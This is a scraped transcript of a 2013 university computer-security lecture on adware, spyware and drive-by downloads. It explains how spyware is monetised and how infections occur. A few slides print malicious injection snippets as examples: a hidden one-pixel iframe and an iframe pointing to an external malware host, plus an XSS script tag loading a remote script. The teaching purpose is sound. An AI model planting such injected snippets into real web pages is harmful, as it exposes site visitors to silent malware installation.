CSCD 303 Essential Computer Security Spring 2013 - PowerPoint PPT Presentation


PPT – CSCD 303 Essential Computer Security Spring 2013 PowerPoint presentation | free to download - id: 729f4a-MDY1M


The Adobe Flash plugin is needed to view this content

Get the plugin now

View by Category
About This Presentation

CSCD 303 Essential Computer Security Spring 2013


Lecture 13 Internet Security Continued Adware and Spyware Reading: Book - Chapter 20 CSCD 303 Essential Computer Security Spring 2013 – PowerPoint PPT presentation

Number of Views:20
Avg rating:3.0/5.0
Slides: 51
Provided by: csf70
Learn more at:


Write a Comment
User Comments (0)
Transcript and Presenter's Notes

Title: CSCD 303 Essential Computer Security Spring 2013

CSCD 303 Essential Computer Security Spring 2013
Lecture 13 Internet Security Continued
Adware and Spyware Reading Book - Chapter 20

  • Spyware/Adware
  • What is it, who is responsible?
  • How do you get infected?
  • Drive-by Downloads and
  • XSS Revisited

What is Adware?
  • Adware
  • Long ago ... had shareware programs (still do)?
  • Adware was distributed with shareware programs to
    pay for the program and
  • Get people to upgrade!

Eudora for Mac
Ads in free version
What is Adware?
  • Adware
  • Legitimate revenue source for companies who offer
    free software
  • How else are they going to get paid?
  • Is Adware malicious?
  • Adware is not malicious
  • Not supposed to track your habits or provide
    information about you to a third party
  • This type of adware is simply serving up random
    paid ads within the program
  • If you uninstall the program, Ads go away!!!

What is Spyware
  • When adware becomes intrusive tracking your
    browsing habits or recording information about
    you ...
  • Then it becomes Spyware
  • Want to avoid it for privacy and security reasons
  • Spyware evolved from Adware
  • People have trouble telling differences between
    adware and spyware

Spyware Defined
  • Spyware is one type of malicious software
    (malware) that collects information from a
    computing system without your consent
  • Spyware can capture keystrokes, screenshots,
    authentication credentials, personal email
    addresses, web form data, internet usage habits,
    and other personal information.

  • Is it always downloaded without users knowledge?
  • Not always ...
  • Licensing agreements that accompany software
    downloads sometimes warn of a spyware program
  • Licensing agreements are often hard-to-read legal
    disclaimers not read by users (including me)?

Eula Showing Spyware
Dangers of Spyware
  • Is Spyware dangerous? What can it do?
  • 1. Record private data and transmit it to a third
  • Spyware can collect technical information about
    users computer
  • Some threats will attempt to steal passwords and
    usernames, often for online banking but other
    things too

Dangers of Spyware
  • 2. Take over your computer
  • Change Web browser settings
  • Homepage, search page, Bookmarks
  • Download and install files
  • Without notifying you or requesting permission

Dangers of Spyware
  • 3.Shut down a program,disable or shut down a PC,
    slow it down
  • Plenty of Spyware is poorly written and prone to
  • Can lock up your machine
  • Some Spyware intentionally disables security
    software like firewalls and anti-virus programs
  • Remote Administration Tools (RATs) allow shut
    down or restart of PC
  • Adds processes, run in background, slows down PC

Purpose of Spyware
  • What is the point of spyware?
  • Not a virus or worm, not trying to harm your PC
  • Want you to connect to Internet, show you ads or
    direct you to sites with ads
  • You are supposed to buy something!!
  • Considered a multi-million dollar business

How the Money Flow Works
  • Direct Advertising Online
  • Dell, Verizon, Citibank, Netflix Viagra resellers
  • Put ads out online ... pay Internet Advertisers
  • Internet Advertisers
  • Middlemen, place company ads on popular websites
  • Hire Spyware Companies

How the Money Flow Works
  • Spyware Companies
  • Create actual spyware programs
  • 180 Solutions, Direct Revenue, Claria, eXact
  • Software Bundlers
  • Sell or distribute Shareware programs,
  • Browser toolbars, earn money by agreeing to
    include spyware with own program

How the Money Flow Works
  • Affiliates
  • Website operators who
  • Agree to offer spyware infected programs on their
  • Example eXact Avertising spyware company, runs
  • Everyone in chain benefits
  • Big company ads are all over Internet
  • Internet ad brokers paid by companies, in turn
    pay spyware makers, in turn pay software bundlers
    and affiliates get paid each time spyware gets
    installed on computer

How the Money Works
  • Website owner joins affiliate
  • program
  • Gets paid each time people click ad
  • Or,
  • Might want to shortcut this process
  • Put Spyware on people's machines, people click on
    ad to close it, counts as a click and website
    owner gets paid

Spyware Stats
  • In the first half of 2007, spyware infections
    prompted 850,000 U.S. households to replace their
  • 1 out of every 11 surveyed had a major, often
    costly problem due to spyware
  • Economic fallout per incident was 100, with
    damage totaling 1.7 billion
  • http//
  • spywareeducationcenter/spyware_statistics.php

Spyware Examples
  • Similar to Virus Classification
  • Where there are many similar viruses ..
  • Spyware is grouped into "families" based not on
    shared program code, but on common behaviors
  • Or by "following the money" of financial or
    business connections

Real Examples
  • CoolWebSearch
  • Group of programs, takes advantage of Internet
    Explorer vulnerabilities
  • Directs traffic to advertisements on Web sites
  • Zango (formerly 180 Solutions)?
  • Transmits detailed information to advertisers
    about Web sites which users visit
  • Also alters HTTP requests for affiliate
    advertisements linked from a Web site,
  • Advertisements make unearned profit for 180
    Solutions Company
  • However, they went bust in 2009 !!!!

Real Examples
  • HuntBar, aka WinTools or Adware,WebSearch
  • Installed by an ActiveX drive-by download at
    affiliate Web sites, or
  • By advertisements displayed by other SpyWare
  • Example of how SpyWare can install more
  • SpyWare
  • Add toolbars to IE,
  • Track browsing behavior,
  • Redirect affiliate references, and
  • Display advertisements

Real Examples
  • Zlob Trojan or just Zlob
  • Downloads itself to your computer via ActiveX
  • Reports back to a Control Server
  • Information can be your search history, Websites
    you visited, and even Key Strokes

Infection Details
  • Spyware can be installed with programs downloaded
    off Internet
  • They either ask you to click on something OR
  • Are Drive-by downloads
  • The only warning you might get would be your
    browser's standard message telling you the name
    of the software
  • and asking if it's
  • okay to install it

Infection Vector
  • Browser Add-ons
  • Pieces of
  • software that add enhancements to your Web
    browser, like a toolbar, animated pal or
    additional search box
  • Can include elements of spyware as part of the
  • Or sometimes they are nothing more than thinly
    veiled spyware themselves

Bonzai Buddy
Infection Vector
  • Piggybacked software installation
  • Particularly peer-to-peer file-sharing clients
  • Will install spyware as a part of their
    standard install
  • Kazaa and others have been known to install

Infection Vector
  • Internet advertising companies such as Valueclick
    or DoubleClick will install cookies on your
  • Every time you load one of their
  • advertising banners
  • Cookies allow them to see what sites you go to
    and what you do on these sites

  • Drive-by Downloads

Serious Vulnerability
  • Drive-by Downloads
  • What are these?
  • Drive-by downloads are caused when a user visits
    a website that exploits browser vulnerabilities
    and launches the automatic download and
    installation of malware without the knowledge or
    permission of the user

Serious Vulnerability
  • Drive-by Downloads
  • Software gets installed without your permission
  • In IE, might see a warning dialog box
  • Non-IE, will not see anything
  • May ask you to click on a link, or can just
    install without your consent if you are running
    as administrator
  • Used for spyware, but also for worms, viruses and
    other malware!

Serious Vulnerability
  • Many Drive-by Downloads done with iFrame
  • An iframe is HTML element that embeds HTML
    document within an already existing document
  • Not all iframes are evil, but some are!!
  • Iframes often used to insert ads within a webpage
  • ltiframe src http//q0i.ru8080/index.php
    width114 height190 stylevisibility
  • This is iframe in text, can easily see it on page
  • Then, they obfuscate it so that it is not easily

Drive-by Downloads
  • Embed this on web page on a normal typically
    visited site
  • Hard to figure out what this is doing
  • Advertisers obfuscate their code to protect their

Drive-by Downloads
  • iframes are not always used for evil
  • Frequent use, for example,
  • Embed remotely hosted dynamic content such as
    online maps into web pages
  • When used by malicious attackers,
  • iframe can be made so small that it is invisible,
  • Visitor to infected page never knows that another
    page is also loading in the tiny iframe window

Drive-by Downloads Web Pages and Browsers
  • Two parts to this problem
  • 1. Getting it onto the Web page so visitors will
  • exposed to it
  • 2. Executing it in user's browser so you get
  • infected

Drive-by Downloads Web Pages and Browsers
  • Getting it onto Web pages
  • a) Can infect the Web Server
  • Remote exploitation of Web servers is increasing
  • Attackers can compromise a Web server and inject
    malicious content
  • They do this by compromising web server
  • Password guessing, OS vulnerability, Web Server
    vulnerability Apache or IIS, SQL Injection
    Inject scripts into SQL database as part of Web

Modern Example of Web Site Infection
  • Webroot Article describes Apache 2.x stealth
  • State that the underground criminal element
    marketed this Apache 2.x module
  • Capable of mass iFrame injection
  • Stealth in that it rotated iFrames on all pages
    of a particular website
  • Module would not reveal iFrame URL to search
  • Cost 1000
  • Used to distribute fake antivirus products
  • http//

Drive-by Downloads Web Pages and Browsers
  • Getting it onto Web pages
  • b) XSS Cross site Scripting
  • Upload content onto user-supplied pages or
    through forms that don't check for script input
  • ltSCRIPT/SRC"http//"gtlt/SCRIPTgt
  • Users will get pages loaded into their browsers
    with embedded, often hidden elements that run

What is XSS? Cross Site Scripting
  • XSS is executing abritrary JavaScript code on
    the page.
  • This could be JavaScript that is inserted into
    the URL or through form submissions
  • If either of those ways of accepting
    information doesn't "clean" the information it is
    getting before outputting it again on the page
  • Then arbitrary JavaScript can run on that page
    and that's an XSS vulnerability

Drive-by Downloads Web Pages and Browsers
  • Two ways of infection
  • 1. Trick you into clicking something
  • 2. Exploits flaw in your Web Browser

Drive-by Downloads Web Pages and Browsers
  • 1. Trick you into clicking
  • As usual, you must load a viewer to see some
    interesting pictures, or view a movie clip
  • You can also download software or pictures
  • Or, you can appear to have been hijacked by fake
  • Good example of this
  • http//

Drive-by Downloads Web Pages and Browsers
  • 2. Exploits flaw in Web Browser or
  • An unpatched browser plug-in, a vulnerable
    ActiveX control, or any other third party
    software flaw
  • How it works
  • User surfs to Website that has been rigged with
    code that in turn redirects connection to a
    malicious third-party server hosting malware code
  • e.g., zero pixel IFRAMEs hide injected content

Drive-by Downloads Web Pages and Browsers
  • Following code is injected into web pages
  • Size of in-line frame is 1 pixel by 1 pixel, so
    not visible to visitor of site unless the person
    looks at the source code ltiframe src
    frameborder"0" width"1" height"1"
    scrolling"no" namecountergtlt/iframegtlthtmlgt
  • Server, index.html file
    contains JavaScript code that attempts to exploit
    a recent Internet Explorer vulnerability to
    download, install, and run a malicious executable

Steps for Drive-by Download
Popular Website
Browser gets redirected by hidden link,
Downloads and executes hidden malware, from
QSI Conference August 26-27, 2008
Steps for Drive-by Download
  • When a drive-by download occurs, the
    following steps usually take place
  • 1a) Attacker compromises legitimate web server
    and inserts
  • script in a web application OR
  • 1b) Attacker has compromised User supplied web
  • 2) Victim visits compromised web site
  • 3) Along with requested page, the user gets
  • attacker injected
  • Script gets executed, it is either exploit
    script or script that imports it from a central
    exploit server
  • 4) A redirection starts from one web server to
    the other that
  • actually plays the part of hop points

Steps for Drive-by Download
  • 5) Following number n of redirections victim
    reaches central exploit server
  • 6) Server sends the exploit script
  • 7) Attacker gains control over the victims
    system, after exploiting the vulnerability that
    was targeted
  • 8) Exploit instructs the browser to visit the
    malware distribution site. This is, actually,
    when the drive-by download starts
  • 9) Malware executables are downloaded
  • 10) The victims computer automatically installs
    and executes the malicious code

Drive-by Downloads Web Pages and Browsers
  • After compromise,
  • Key loggers and other spyware installed
  • Your information flowing to attacker web sites

Example Drive-by
  • One high-profile web site compromise in 2007
  • Shows how drive-by downloads are launched against
    computer users
  • In the weeks leading up to the NFL Super Bowl
  • Miamis Dolphin Stadium site was hacked and
    rigged with a snippet of JavaScript

Example Drive-by
  • Visitors with unpatched Windows machine were
  • silently connected to remote third-party
    attempted to
  • exploit known vulnerabilities described by
  • MS06-014 and MS07-004 bulletins
  • If exploit was successful, Trojan silently
    installed that gave attacker full access to
    compromised computer
  • Alert Url http//

Another Example of Drive-by
  • Trojan downloader loaded keylogger to users'
  • Stole passwords to WOW
  • Stolen accounts sold on Black Market
  • In this case, got onto site through vulnerability
    on website
  • Allowed access to site where they injected code
    that showed up on website
  • http//

  • Spyware
  • http//
  • http//
  • Drive-by Downloads
  • http//
  • http//
  • http//

No Lab this week !!! Midterm and Assignment Due